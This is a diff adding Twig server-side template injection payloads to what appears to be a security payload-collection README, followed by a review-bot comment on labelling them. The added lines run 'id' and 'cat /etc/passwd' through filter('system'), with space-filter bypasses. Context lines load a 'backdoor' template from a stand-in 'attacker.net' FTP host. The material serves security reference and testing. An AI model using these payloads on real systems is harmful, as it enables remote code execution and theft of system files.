diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index 0f780ee..9fc9ac5 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -157,6 +157,9 @@ $output = $twig > render ( {{self}} {{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}} {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}} +{{['id']|filter('system')}} +{{['cat\x20/etc/passwd']|filter('system')}} +{{['cat$IFS/etc/passwd']|filter('system')}} ``` Example with an email passing FILTER_VALIDATE_EMAIL PHP.
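Review bot: The three added `filter('system')` lines at the end of the Twig code block carry no label or comment, although they rely on a different mechanism from the `_self.env` lines directly above them. Add a short heading or one-line description saying which Twig versions these apply to. The description should also state that the `\x20` and `$IFS` lines are the same `cat /etc/passwd` command written without a literal space, so readers do not take them for three separate techniques. Since the last two lines exist only to get past space filtering, the README could note next to them that stripping or rejecting spaces in input is not a mitigation, and that the fix is to stop rendering user-controlled strings as template source.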